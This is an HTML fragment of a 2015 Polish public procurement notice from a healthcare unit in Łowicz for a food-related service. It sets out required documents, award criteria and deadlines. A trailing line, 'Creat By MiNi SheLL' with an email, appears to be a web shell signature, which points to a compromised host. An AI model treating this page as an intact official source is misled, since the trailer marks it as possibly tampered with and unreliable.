<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Certyfikat ISO 22000 
2. świadectwo wprowadzenia i utrzymanie systemu HACCP zapewniającego bezpieczeństwo żywności i żywienia 
3. oświadczenie, że Wykonawca po podpisaniu umowy przedstawi  decyzję właściwego terytorialnie Państwowego Inspektora Sanitarnego dopuszczającą do realizacji usługi 
4. oświadczenie, że Wykonawca po podpisaniu umowy przedstawi decyzję/umowę/dokument na odbiór odpadów pokonsumpcyjnych</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.pol.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej, 99-400 Łowicz, ul. Ułańska 28 - budynek administarcji-pokój 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 12:00, miejsce: Zespół Opieki Zdrowotnej, 99-400 Łowicz, ul. Ułańska 28 - budynek administarcji-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com